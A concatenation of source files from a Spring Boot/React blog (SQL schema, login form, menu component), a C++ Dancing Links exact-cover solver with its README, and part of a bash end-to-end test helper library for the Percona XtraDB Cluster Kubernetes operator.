utf8_general_ci NOT NULL, `menu_data` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, PRIMARY KEY (`menu_id`) USING BTREE ) ENGINE = InnoDB AUTO_INCREMENT = 10001 CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of menu -- ---------------------------- INSERT INTO `menu` VALUES (10000, 10000, '1', '手动阀设法使'); -- ---------------------------- -- Table structure for replay -- ---------------------------- DROP TABLE IF EXISTS `replay`; CREATE TABLE `replay` ( `replay_id` int(11) NOT NULL, `article_id` int(11) NOT NULL, `content` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `user_id` int(11) DEFAULT NULL, PRIMARY KEY (`replay_id`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Table structure for role -- ---------------------------- DROP TABLE IF EXISTS `role`; CREATE TABLE `role` ( `role_id` int(11) NOT NULL COMMENT '唯一标识', `role` varchar(0) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '角色', PRIMARY KEY (`role_id`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Table structure for user -- ---------------------------- DROP TABLE IF EXISTS `user`; CREATE TABLE `user` ( `user_id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT '用户自增id,起始为10000', `user_account` varchar(11) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT '用户账号(唯一标识)7-11位', `password` varchar(15) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT '用户密码,7-15位', `user_email` varchar(30) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT '用户邮箱', `user_name` varchar(10) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT '用户名', `user_avatar` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT '头像', `create_time` datetime(0) DEFAULT NULL COMMENT '创建日期(初始化就是创建时间)', `update_time` datetime(0) DEFAULT 
NULL ON UPDATE CURRENT_TIMESTAMP(0) COMMENT '最后一次修改日期', `last_login_time` datetime(0) DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP(0) COMMENT '最后一次登录日期', `status` int(2) UNSIGNED NOT NULL DEFAULT 0 COMMENT '用户状态(0为正常)', `birthday` date DEFAULT NULL COMMENT '出生日期', `telephone` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT '用户电话', `role_id` int(11) UNSIGNED ZEROFILL DEFAULT NULL COMMENT '权限', PRIMARY KEY (`user_id`) USING BTREE ) ENGINE = InnoDB AUTO_INCREMENT = 10002 CHARACTER SET = utf8 COLLATE = utf8_bin ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of user -- ---------------------------- INSERT INTO `user` VALUES (10000, 'zwbsdmpy', 'zwbsdmpy', '', '', '', NULL, NULL, NULL, 0, NULL, '', 00000000000); SET FOREIGN_KEY_CHECKS = 1; <file_sep>/blogs/src/component/login/Form.jsx import React, {Component} from "react"; export default class LoginForm extends Component { state = { username: "", password: "" }; handleNameChange = (event) => { console.log("handleNameChange"); const userName = event.target.value; this.setState({userName}); }; handlePasswordChange = (event) => { console.log("handleContentChange"); const password = event.target.value; this.setState({password}); }; handleSubmit = (event) => { }; render() { return ( <div> <form className="text-left form-validate"> <div className="form-group-material"> <input id="userAccount" type="text" name="userAccount" required data-msg="请输入用户名" className="input-material" onChange={this.handleNameChange}/> <label htmlFor="userAccount" className="label-material">账号</label> </div> <div className="form-group-material"> <input id="password" type="password" name="loginPassword" required data-msg="请输入密码" className="input-material" onChange={this.handlePasswordChange}/> <label htmlFor="password" className="label-material">密码</label> </div> <div className="form-group text-center"> <input type="submit" id="login" className="btn btn-primary" value="登录" onClick={this.handleSubmit}/> </div> </form> 
</div> ) } }<file_sep>/src/main/java/com/util/FileUtil.java package com.util; import java.io.*; public class FileUtil { } <file_sep>/blogs/src/component/common/CommonSider.jsx import {Layout, Menu} from "antd"; import React, {Component} from "react"; import {connect} from 'react-redux' const {Sider} = Layout; const {SubMenu} = Menu; /** * TODO: 数据库中存储每个用户的列表信息以及图标 */ export class CommonSider extends Component { constructor(props) { super(props); this.state = { collapsed: false, key: 0, }; } componentDidMount() { } // 是否折叠左边扩展栏 onCollapse = collapsed => { this.setState({collapsed}); }; // 构建左导航栏菜单 handleSiderMenuList = (siderMenuList) => { let menuList = []; let key = 0; siderMenuList.map((item) => { let menuItem = []; if (Array.isArray(item)) { item.map((subMenu) => { let subMenuKeys = Object.keys(subMenu); subMenuKeys.map((subMenuKey) => { let subMenuItems = []; subMenu[subMenuKey].map((subMenuItem) => { subMenuItems.push( <Menu.Item key={key++}>{subMenuItem}</Menu.Item> ); }) let menuItem = ( <SubMenu key={key++} title={subMenuKey}> {subMenuItems} </SubMenu>) menuList.push(menuItem); }) }) let subMenuName = item } else { menuItem = ( <Menu.Item key={key++}> {item} </Menu.Item> ) menuList.push(menuItem); } }) return menuList; } handleSubMenu = (content, key) => { return ( <Menu.Item key={key++}> {content} </Menu.Item> ) } handleMenuItem = () => { } render() { let siderData = this.props.siderData; return ( <Sider collapsible="true" collapsed={this.state.collapsed} onCollapse={this.onCollapse}> <div className="logo"/> <Menu theme="dark" defaultSelectedKeys={['1']} mode="inline"> <Menu.Item key="1"> 所有博客 </Menu.Item> <SubMenu key="sub1" title="分类"> <Menu.Item key="2">Java</Menu.Item> <Menu.Item key="3">Spring</Menu.Item> <Menu.Item key="4">React</Menu.Item> <Menu.Item key="5">数据库</Menu.Item> <Menu.Item key="6">算法</Menu.Item> <Menu.Item key="7">计算机网络</Menu.Item> </SubMenu> <Menu.Item key="8">个人信息</Menu.Item> </Menu> </Sider> ) } } const mapStateToProps = (state) => { 
return { siderMenuList: state.mainView.siderMenuList } } export default connect(mapStateToProps)(CommonSider); <file_sep>/blogs/src/container/Manager.jsx import {connect} from "react-redux"; import ManagerView from "../component/ManagerView"; import * as action from "../redux/actionCreater"; const mapStateToProps = (state) => { return { userData: state.mainView.userData, } } const mapDispatchToProps = (dispatch) => { return { login: (user) => dispatch(action.login(user)) } } export default connect(mapStateToProps, mapDispatchToProps)(ManagerView) <file_sep>/src/test/java/com/springboot_blog/base/Int2String.java package com.springboot_blog.base; import org.junit.Test; public class Int2String { @Test public void int2String () { String s = "ssss"; System.out.println (Integer.getInteger (s)); } } <file_sep>/src/test/java/com/springboot_blog/database/ArticleTest.java package com.springboot_blog.database; import com.dao.ArticleDao; import org.junit.runner.RunWith; import org.mybatis.spring.annotation.MapperScan; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.test.context.SpringBootTest; import org.springframework.test.context.junit4.SpringRunner; @SpringBootTest @RunWith (SpringRunner.class) @MapperScan (basePackages = {"com.dao"}) public class ArticleTest { @Autowired ArticleDao articleDao; }
49391710b7e997571ed11a7e50ff2488bf4a0281
[ "JavaScript", "Java", "SQL" ]
21
JavaScript
zwbsdmpy/springboot_blogs
4f8521ea9bb737113eab77947cf5c693a9d99176
bae698b7047e5afc6e73e5cc1dc1a410dfd5d448
refs/heads/main
<repo_name>Logismos/dlx<file_sep>/example.cpp #include "dlx.h" #include <iostream> #include <random> #include <string> template<class T> using Matrix=std::vector<std::vector<T>>; template<class T> Matrix<T> gen_rand_matrix(size_t n) { Matrix<T> mat; for (size_t i = 0; i < n/2; ++i) { std::vector<T> row1; std::vector<T> row2; for (size_t j = 0; j < n; ++j) { float r = (float)rand() / (float)RAND_MAX; row1.push_back((T)((r > 0.5) ? 1 : 0)); row2.push_back((T)((row1[j] == 0) ? 1 : 0)); } mat.push_back(std::move(row1)); mat.push_back(std::move(row2)); } return mat; } std::vector<std::string> gen_column_names(size_t n) { std::vector<std::string> col_names; for (size_t i = 0; i < n; ++i) col_names.push_back(std::to_string(i)); return col_names; } int main() { using namespace std; srand(0); vector<string> column_names; column_names = {"A", "B", "C", "D", "E", "F", "G"}; vector<vector<bool> > test_matrix{{0, 0, 1, 0, 1, 1, 0}, {1, 0, 0, 1, 0, 0, 1}, {0, 1, 1, 0, 0, 1, 0}, {1, 0, 0, 1, 0, 0, 0}, {0, 1, 0, 0, 0, 0, 1}, {0, 0, 0, 1, 1, 0, 1}}; // You can also comment out the next three lines // size_t n = 10; // test_matrix = gen_rand_matrix<bool>(n); // column_names = gen_column_names(n); auto dlx = Dlx::DancingLinks(test_matrix); dlx.Search(); std::cout << "n solutions: " << dlx.SolutionCount() << '\n'; for (const auto& solution : dlx.GetSolutions()) { std::cout << "solution:\n"; auto decoded_solution = dlx.DecodeSolution(column_names, solution); for (auto& row : decoded_solution) { for (auto& s : row) { std::cout << s << " "; } std::cout << '\n'; } } return 0; } <file_sep>/memory_pool.h // Simple memory pool for dlx nodes #ifndef MEMORY_POOL_H #define MEMORY_POOL_H #include <vector> namespace Dlx { template<class T> class MemoryPool { public: MemoryPool() = default; MemoryPool(size_t n) { m_data.resize(n); } void Resize(size_t n) { m_data.resize(n); } T* New() { if (m_ptr < m_data.size()) return &m_data[m_ptr++]; else return nullptr; } private: std::vector<T> m_data; 
size_t m_ptr = 0; }; } // namespace #endif <file_sep>/README.md # Dancing Links (dlx) Exact cover solver using the dancing links (DLX) algorithm proposed by <NAME> [1]. Given a list of subsets over some __U__, an exact cover is a subset of these subsets, such that their union is equal to __U__, and each subset is disjoint from the other. The exact cover is also known as the independent set cover. Finding the exact cover is a NP complete problem, so no known polynomial-time solver exists. <NAME> detailed a simple and memory efficient way to find all exact covers for a problem represented as a binary matrix. The items to cover, or __U__, are represented by the columns in a binary matrix; each row represents a subset, with index _(i, j)_ set to true if row (subset) _i_ contains column (element) _j_. A solution is then a list of rows which satisfy the exact cover constraints (union equal to __U__, and all disjoint). See example.cpp for an example usage. # Optimizations - The circular linked lists are implemented so that the nodes all reside in a single chunk of memory (`std::vector`). This provides a bit of a speed up due to locality. - The solutions are represented as a list of indices indicating the rows, as opposed to a subset of the rows themselves. # References 1. https://arxiv.org/abs/cs/0011047 <file_sep>/Makefile example: g++ -std=c++2a example.cpp -o example clean: rm -f example .PHONY: clean <file_sep>/dlx.h // Dancing Links solver for the exact cover problem. // Finds subset of rows in a binary matrix such that each row is // disjoint, and whose union covers each column. 
#ifndef DLX_H #define DLX_H #include <algorithm> #include <iostream> #include <vector> #include "memory_pool.h" namespace Dlx { using Index=size_t; using BinaryMatrix=std::vector<std::vector<bool>>; class Node { public: Node* left; Node* right; Node* up; Node* down; Node* column; size_t size; // column size Index row_idx; // useful for generating solution // ctor Node() : left(this), right(this), up(this), down(this), column(this), size(0), row_idx(-1) {} }; class DancingLinks { public: using Row=size_t; using Solution=std::vector<Row>; public: // ctor DancingLinks(const BinaryMatrix& bin_mat) { if (bin_mat.size() == 0 or bin_mat[0].size() == 0) { // \todo throw error return; } size_t nrows = bin_mat.size(); size_t ncols = bin_mat[0].size(); // Determine how many nodes (nonzero entries in bin_mat) // Concurrently, determine which columns each row covers size_t node_count = 0; m_rows.reserve(nrows); for (size_t i = 0; i < nrows; ++i) { std::vector<size_t> row; for (size_t j = 0; j < ncols; ++j) { if (bin_mat[i][j]) { ++node_count; row.push_back(j); } } m_rows.push_back(std::move(row)); } // Initialize memory pool and root node m_pool.Resize(node_count + 1 /* for root */ + ncols); m_root = m_pool.New(); m_root->size = (size_t)(-1); // For keeping track of last node in column std::vector<Node*> prev_row(ncols); // Initialize column nodes Node* last_node = m_root; for (size_t j = 0; j < ncols; ++j) { Node* column_node = m_pool.New(); prev_row[j] = column_node; last_node->right = column_node; column_node->left = last_node; last_node = column_node; } last_node->right = m_root; m_root->left = last_node; // Construct a node for each nonzero element in binary matrix for (size_t i = 0; i < nrows; ++i) { Node* first_in_row = nullptr; Node* last_in_row = nullptr; for (size_t j : m_rows[i]) { Node* cur_node = m_pool.New(); cur_node->row_idx = i; // Up Node* up_node = prev_row[j]; prev_row[j] = cur_node; cur_node->up = up_node; up_node->down = cur_node; // Column Node* 
column_node = up_node->column; cur_node->column = column_node; ++column_node->size; // Left (if not the first seen in row thus far) if (last_in_row == nullptr) { first_in_row = cur_node; } else { cur_node->left = last_in_row; last_in_row->right = cur_node; } last_in_row = cur_node; } if (first_in_row != nullptr) { first_in_row->left = last_in_row; last_in_row->right = first_in_row; } } // Connect last nodes in columns to respective columns for (size_t j = 0; j < ncols; ++j) { Node* column_node = prev_row[j]->column; prev_row[j]->down = column_node; column_node->up = prev_row[j]; } } // Find all solutions and store in memory void Search() { Search_(0); } // Get all solutions const std::vector<Solution>& GetSolutions() const { return m_solutions;} // Return number of solutions const size_t SolutionCount() const { return m_solutions.size(); } const std::vector<size_t>& RowToColumns(size_t r) const { return m_rows.at(r);} const Solution& GetSolution(size_t idx) const { return m_solutions.at(idx);} // Helper function for converting a solution (subset of rows) to // whatever the user defines the covered columns to be template<class T> std::vector<std::vector<T>> DecodeSolution(const std::vector<T>& columns, const Solution& solution) const { std::vector<std::vector<T>> decoded_solution; for (size_t row : solution) { std::vector<T> decoded_row; const auto& cols = RowToColumns(row); for (size_t col : cols) { decoded_row.push_back(columns.at(col)); } decoded_solution.push_back(std::move(decoded_row)); } return decoded_solution; } private: /* dlx specific functions */ // cover column and remove conflicting rows void Cover(Node* col_node) { col_node->right->left = col_node->left; col_node->left->right = col_node->right; for (Node* i_node = col_node->down; i_node != col_node; i_node = i_node->down) { for (Node* j_node = i_node->right; j_node != i_node; j_node = j_node->right) { j_node->down->up = j_node->up; j_node->up->down = j_node->down; --col_node->size; } } } // undo 
effects of Cover() void Uncover(Node* col_node) { for (Node* i_node = col_node->up; i_node != col_node; i_node = i_node->up) { for (Node* j_node = i_node->left; j_node != i_node; j_node = j_node->left) { ++col_node->size; j_node->down->up = j_node; j_node->up->down = j_node; } } col_node->right->left = col_node; col_node->left->right = col_node; } // heuristic for choosing column Node* ChooseColumn() { Node* best_node = m_root; for (Node* col_node = m_root->right; col_node != m_root; col_node = col_node->right) { if (col_node->size < best_node->size) { best_node = col_node; } } return best_node; } // Recursively search for solutions void Search_(size_t k) { Node* col_node = ChooseColumn(); // Potential solution found if (col_node == m_root) { Solution solution; std::transform(m_cur_solution.begin(), m_cur_solution.begin() + k, std::back_inserter(solution), [](Node* r) -> Index { return r->row_idx;}); if (solution.size()) { m_solutions.push_back(std::move(solution)); } return; } Cover(col_node); for (Node* r_node = col_node->down; r_node != col_node; r_node = r_node->down) { if (k >= m_cur_solution.size()) { m_cur_solution.resize(k * 2 + 1); } m_cur_solution[k] = r_node; for (Node* c_node = r_node->right; c_node != r_node; c_node = c_node->right) { Cover(c_node->column); } Search_(k+1); // \todo These two lines necessary? r_node = m_cur_solution[k]; col_node = r_node->column; for (Node* c_node = r_node->left; c_node != r_node; c_node = c_node->left) { Uncover(c_node->column); } } Uncover(col_node); } /* Member variables */ MemoryPool<Node> m_pool; // For managing linked list memory Node* m_root; std::vector<Solution> m_solutions; // soltuions std::vector<Node*> m_cur_solution; // for building current solution std::vector<std::vector<size_t>> m_rows; // map from row to covered columns }; } // namespace #endif // DLX_H
e1ce543856f66d0e9039dbb5f89a4d4d0ec3df70
[ "Markdown", "Makefile", "C++" ]
5
C++
Logismos/dlx
d3dd4ee77624a66668c38a7aae7a0f15c8afa80a
61605292a5df32ba72ec3c65ae6cebb2cbf85648
refs/heads/master
<repo_name>bitsbeats/percona-xtradb-cluster-operator<file_sep>/e2e-tests/init-deploy/compare/monitor-80.sql GRANT SELECT, RELOAD, PROCESS, SUPER, REPLICATION CLIENT ON *.* TO `monitor`@`%` GRANT SELECT, UPDATE, DELETE, DROP ON `performance_schema`.* TO `monitor`@`%` <file_sep>/e2e-tests/functions #!/bin/bash exec 5>&2 BASH_XTRACEFD="5" GIT_COMMIT=$(git rev-parse HEAD) GIT_BRANCH=${VERSION:-$(git rev-parse --abbrev-ref HEAD | sed -e 's^/^-^g; s^[.]^-^g;' | tr '[:upper:]' '[:lower:]')} API="pxc.percona.com/v1-4-0" IMAGE=${IMAGE:-"perconalab/percona-xtradb-cluster-operator:${GIT_BRANCH}"} IMAGE_PXC=${IMAGE_PXC:-"perconalab/percona-xtradb-cluster-operator:master-pxc8.0"} IMAGE_PMM=${IMAGE_PMM:-"perconalab/percona-xtradb-cluster-operator:master-pmm"} IMAGE_PROXY=${IMAGE_PROXY:-"perconalab/percona-xtradb-cluster-operator:master-proxysql"} IMAGE_BACKUP=${IMAGE_BACKUP:-"perconalab/percona-xtradb-cluster-operator:master-pxc8.0-backup"} tmp_dir=$(mktemp -d) sed=$(which gsed || which sed) date=$(which gdate || which date) test_name=$(basename $test_dir) namespace="${test_name}-${RANDOM}" conf_dir=$(realpath $test_dir/../conf || :) src_dir=$(realpath $test_dir/../..) 
if oc projects 2>&1 | egrep -q 'You have access to the following projects|You are not a member of any projects|You have one project on this server'; then OPENSHIFT=1 fi HELM_VERSION=$(helm version -c | $sed -re 's/.*SemVer:"([^"]+)".*/\1/; s/.*\bVersion:"([^"]+)".*/\1/') if [ "${HELM_VERSION:0:2}" == "v2" ]; then HELM_ARGS="--name" fi wait_cluster_consistency() { cluster_name=$1 cluster_size=$2 sleep 7 # wait for two reconcile loops ;) 3 sec x 2 times + 1 sec = 7 seconds until [[ "$(kubectl_bin get pxc "${cluster_name}" -o jsonpath='{.status.state}')" == "ready" \ && "$(kubectl_bin get pxc "${cluster_name}" -o jsonpath='{.status.pxc.ready}')" == "${cluster_size}" \ && "$(kubectl_bin get pxc "${cluster_name}" -o jsonpath='{.status.proxysql.ready}')" == "${cluster_size}" ]]; do echo 'waiting for cluster readyness' sleep 20 done } create_namespace() { local namespace="$1" if [ "$OPENSHIFT" == 1 ]; then oc delete project "$namespace" && sleep 40 || : oc new-project "$namespace" oc project "$namespace" oc adm policy add-scc-to-user hostaccess -z default || : else kubectl_bin delete namespace "$namespace" || : wait_for_delete "namespace/$namespace" kubectl_bin create namespace "$namespace" kubectl_bin config set-context $(kubectl_bin config current-context) --namespace="$namespace" fi } get_operator_pod() { kubectl_bin get pods \ --selector=name=percona-xtradb-cluster-operator \ -o 'jsonpath={.items[].metadata.name}' } wait_pod() { local pod=$1 set +o xtrace retry=0 echo -n $pod #until kubectl_bin get pod/$pod -o jsonpath='{.status.phase}' 2>/dev/null | grep 'Running'; do until kubectl_bin get pod/$pod -o jsonpath='{.status.containerStatuses[0].ready}' 2>/dev/null | grep 'true'; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 480 ]; then kubectl_bin describe pod/$pod kubectl_bin logs $pod kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. 
something went wrong with operator or kubernetes cluster exit 1 fi done set -o xtrace } wait_backup() { local backup=$1 set +o xtrace retry=0 echo -n $backup until kubectl_bin get pxc-backup/$backup -o jsonpath='{.status.state}' 2>/dev/null | grep 'Succeeded'; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 60 ]; then kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done set -o xtrace } wait_backup_restore() { local backup_name=$1 set +o xtrace retry=0 echo -n $backup_name until kubectl_bin get pxc-restore/$backup_name -o jsonpath='{.status.state}' 2>/dev/null | grep 'Succeeded'; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 1500 ]; then kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done echo set -o xtrace } deploy_operator() { desc 'start operator' kubectl_bin apply -f ${src_dir}/deploy/crd.yaml || : kubectl_bin apply -f ${src_dir}/deploy/rbac.yaml cat ${src_dir}/deploy/operator.yaml \ | sed -e "s^image: .*^image: ${IMAGE}^" \ | kubectl_bin apply -f - sleep 2 wait_pod $(get_operator_pod) } deploy_helm() { if [ "${HELM_VERSION:0:2}" == "v3" ]; then helm repo add stable https://kubernetes-charts.storage.googleapis.com/ helm repo update return 0 fi local namespace="$1" if [ "$OPENSHIFT" == 1 ]; then export TILLER_NAMESPACE=tiller oc new-project tiller || : oc project tiller oc process -f https://github.com/openshift/origin/raw/master/examples/helm/tiller-template.yaml -p TILLER_NAMESPACE="tiller" -p HELM_VERSION=$HELM_VERSION | oc apply -f - else kubectl_bin --namespace kube-system create sa tiller || : kubectl_bin create clusterrolebinding tiller --clusterrole cluster-admin --serviceaccount=kube-system:tiller || : helm init --service-account tiller kubectl_bin config set-context $(kubectl_bin config current-context) --namespace="kube-system" fi tiller_pod=$( kubectl_bin get 
pods \ --selector=name=tiller \ -o 'jsonpath={.items[].metadata.name}' ) wait_pod $tiller_pod if [ "$OPENSHIFT" == 1 ]; then oc project "$namespace" oc policy add-role-to-user edit "system:serviceaccount:tiller:tiller" else kubectl_bin config set-context $(kubectl_bin config current-context) --namespace="$namespace" fi } wait_for_running() { local name="$1" let last_pod="$(($2-1))" || : for i in $(seq 0 $last_pod); do wait_pod ${name}-${i} done } wait_for_delete() { local res="$1" set +o xtrace echo -n "$res - " retry=0 until (kubectl_bin get $res || :) 2>&1 | grep NotFound; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 120 ]; then kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done set -o xtrace } compare_kubectl() { local resource="$1" local postfix="$2" local expected_result=${test_dir}/compare/${resource//\//_}${postfix}.yml local new_result="${tmp_dir}/${resource//\//_}.yml" if [ "$OPENSHIFT" = 1 -a -f ${expected_result//.yml/-oc.yml} ]; then expected_result=${expected_result//.yml/-oc.yml} fi if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${expected_result//.yml/-80.yml} ]; then expected_result=${expected_result//.yml/-80.yml} fi kubectl_bin get -o yaml ${resource} \ | egrep -v "namespace:|uid:|resourceVersion:|selfLink:|creationTimestamp:|.*: default-token-.*|deletionTimestamp:|image:|clusterIP:|dataSource:|procMount:" \ | egrep -v "^ storageClassName:|finalizers:|kubernetes.io/pvc-protection|volumeName:|storage-provisioner:|status: \{\}|volumeMode: Filesystem" \ | egrep -v "percona.com/.*-hash:|control-plane.alpha.kubernetes.io/leader:|volume.kubernetes.io/selected-node:" \ | egrep -v "healthCheckNodePort:|nodePort:|nodeName:" \ | $sed -e '/^status:$/,+100500d' \ | $sed -e '/NAMESPACE/,+1d' \ | $sed -e '/name: suffix/,+1d' \ | $sed -e '/name: S3_BUCKET_PATH/,+1d' \ | $sed -e '/name: S3_BUCKET_URL/,+1d' \ > ${new_result} diff -u ${expected_result} ${new_result} } 
get_client_pod() { kubectl_bin get pods \ --selector=name=pxc-client \ -o 'jsonpath={.items[].metadata.name}' } run_mysql() { local command="$1" local uri="$2" client_pod=$(get_client_pod) wait_pod $client_pod 1>&2 [[ ${-/x} != $- ]] && echo "+ kubectl exec -it $client_pod -- bash -c \"printf '$command\n' | mysql -sN $uri\"" >&$BASH_XTRACEFD set +o xtrace kubectl_bin exec $client_pod -- \ bash -c "printf '$command\n' | mysql -sN $uri" 2>&1 \ | sed -e 's/mysql: //' \ | (grep -v 'Using a password on the command line interface can be insecure.' || :) set -o xtrace } run_mysql_local() { local command="$1" local uri="$2" local pod="$3" [[ ${-/x} != $- ]] && echo "+ kubectl exec -it $pod -- bash -c \"printf '$command\n' | mysql -sN $uri\"" >&$BASH_XTRACEFD set +o xtrace kubectl_bin exec $pod -- \ bash -c "printf '$command\n' | mysql -sN $uri" 2>&1 \ | sed -e 's/mysql: //' \ | (egrep -v 'Using a password on the command line interface can be insecure.|Defaulting container name|see all of the containers in this pod' || :) set -o xtrace } compare_mysql_cmd() { local command_id="$1" local command="$2" local uri="$3" local postfix="$4" local expected_result=${test_dir}/compare/${command_id}${postfix}.sql if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${test_dir}/compare/${command_id}${postfix}-80.sql ]; then expected_result=${test_dir}/compare/${command_id}${postfix}-80.sql fi run_mysql "$command" "$uri" \ > $tmp_dir/${command_id}.sql diff -u $expected_result $tmp_dir/${command_id}.sql } get_proxy_primary() { local uri="$1" local pod="$2" local ip=$(run_mysql_local 'SELECT hostname FROM runtime_mysql_servers WHERE hostgroup_id=11 AND status="ONLINE";' "$uri" "$pod") while [ $(echo "$ip" | wc -l) != 1 ]; do sleep 1 ip=$(run_mysql_local 'SELECT hostname FROM runtime_mysql_servers WHERE hostgroup_id=11 AND status="ONLINE";' "$uri" "$pod") done if [[ "$IMAGE_PXC" =~ 8\.0$ ]] ; then echo $ip | cut -d'.' 
-f1 else get_pod_name "$ip" fi } get_pod_name() { local ip=$1 kubectl_bin get pods -o json | jq -r '.items[] | select(.status.podIP == "'$ip'") | .metadata.name' } get_pod_ip() { local name=$1 kubectl_bin get pods -o json | jq -r '.items[] | select(.metadata.name == "'$name'") | .status.podIP' } compare_mysql_user(){ local uri="$1" local postfix="$2" local user=$(echo $uri | sed -e 's/.*-u//; s/ .*//') local expected_result=${test_dir}/compare/$user$postfix.sql if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${test_dir}/compare/$user$postfix-80.sql ]; then expected_result=${test_dir}/compare/$user$postfix-80.sql fi (run_mysql "SHOW GRANTS;" "$uri" || :) \ | sed -e "s/'10[.][0-9][^']*'//; s/'[^']*[.]internal'//" \ > $tmp_dir/$user.sql diff -u $expected_result $tmp_dir/$user.sql } compare_mysql_user_local(){ local uri="$1" local pod="$2" local postfix="$3" local user=$(echo $uri | sed -e 's/.*-u//; s/ .*//') local expected_result=$test_dir/compare/$user$postfix.sql if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${test_dir}/compare/$user$postfix-80.sql ]; then expected_result=${test_dir}/compare/$user$postfix-80.sql fi (run_mysql_local "SHOW GRANTS;" "$uri" "$pod" || :) \ | sed -e "s/'10[.][0-9][^']*'//; s/'[^']*[.]internal'//" \ > $tmp_dir/$user.sql diff -u $expected_result $tmp_dir/$user.sql } get_pumba() { kubectl_bin get pods \ --selector=name=pumba \ -o 'jsonpath={.items[].metadata.name}' } run_pumba() { local cmd="$*" kubectl_bin exec -it "$(get_pumba)" -- /pumba -l info ${cmd} } deploy_cert_manager() { kubectl_bin create namespace cert-manager || : kubectl_bin label namespace cert-manager certmanager.k8s.io/disable-validation=true || : kubectl_bin apply -f https://github.com/jetstack/cert-manager/releases/download/v0.10.1/cert-manager.yaml --validate=false || : 2>/dev/null } destroy() { local namespace="$1" kubectl_bin logs $(get_operator_pod) \ | grep -v '"level":"info"' \ | grep -v 'the object has been modified' \ | grep -v 'get backup status: Job.batch' \ | $sed -r 
's/"ts":[0-9.]+//; s^limits-[0-9.]+/^^g' \ | sort -u \ | tee $tmp_dir/operator.log #TODO: maybe will be enabled later #diff $test_dir/compare/operator.log $tmp_dir/operator.log kubectl_bin delete pxc --all kubectl_bin delete pxc-backup --all kubectl_bin delete pxc-restore --all || : kubectl_bin delete -f https://github.com/jetstack/cert-manager/releases/download/v0.10.1/cert-manager.yaml 2>/dev/null || : if [ "$OPENSHIFT" == 1 ]; then oc delete --grace-period=0 --force=true project "$namespace" else kubectl_bin delete --grace-period=0 --force=true namespace "$namespace" fi rm -rf ${tmp_dir} } desc() { set +o xtrace local msg="$@" printf "\n\n-----------------------------------------------------------------------------------\n" printf "$msg" printf "\n-----------------------------------------------------------------------------------\n\n" set -o xtrace } get_service_endpoint() { local service=$1 local hostname=$( kubectl_bin get service/$service -o json \ | jq '.status.loadBalancer.ingress[].hostname' \ | sed -e 's/^"//; s/"$//;' ) if [ -n "$hostname" -a "$hostname" != "null" ]; then echo $hostname return fi local ip=$( kubectl_bin get service/$service -o json \ | jq '.status.loadBalancer.ingress[].ip' \ | sed -e 's/^"//; s/"$//;' ) if [ -n "$ip" -a "$ip" != "null" ]; then echo $ip return fi exit 1 } get_metric_values() { local metric=$1 local instance=$2 local user_pass=$3 local start=$($date -u "+%s" -d "-1 minute") local end=$($date -u "+%s") local endpoint=$(get_service_endpoint monitoring-service) curl -s -k "https://${user_pass}@$endpoint/graph/api/datasources/proxy/1/api/v1/query_range?query=$metric%7bcontainer_name%3d%22$instance%22%7d%20or%20$metric%7binstance%3d%22$instance%22%7d&start=$start&end=$end&step=60" \ | jq '.data.result[0].values[][1]' \ | grep '^"[0-9]' } get_qan_values() { local instance=$1 local start=$($date -u "+%Y-%m-%dT%H:%M:%S" -d "-30 minute") local end=$($date -u "+%Y-%m-%dT%H:%M:%S") local endpoint=$(get_service_endpoint 
monitoring-service) local uuid=$( curl -s -k "https://$endpoint/qan-api/instances?deleted=no" \ | jq '.[] | select(.Subsystem == "mysql" and .Name == "'$instance'") | .UUID' \ | sed -e 's/^"//; s/"$//;' ) curl -s -k "https://$endpoint/qan-api/qan/profile/$uuid?begin=$start&end=$end&offset=0" \ | jq '.Query[].Fingerprint' } get_qan20_values() { local instance=$1 local user_pass=$2 local start=$($date -u "+%Y-%m-%dT%H:%M:%S" -d "-30 minute") local end=$($date -u "+%Y-%m-%dT%H:%M:%S") local endpoint=$(get_service_endpoint monitoring-service) cat > payload.json << EOF { "columns":[ "load", "num_queries", "query_time" ], "first_seen": false, "group_by": "queryid", "include_only_fields": [], "keyword": "", "labels": [ { "key": "cluster", "value": ["pxc"] }], "limit": 10, "offset": 0, "order_by": "-load", "main_metric": "load", "period_start_from": "$($date -u -d '-12 hour' '+%Y-%m-%dT%H:%M:%S%:z')", "period_start_to": "$($date -u '+%Y-%m-%dT%H:%M:%S%:z')" } EOF curl -s -k -XPOST -d @payload.json "https://${user_pass}@$endpoint/v0/qan/GetReport" \ | jq '.rows[].fingerprint' rm -f payload.json } cat_config() { cat "$1" \ | $sed -e "s#apiVersion: 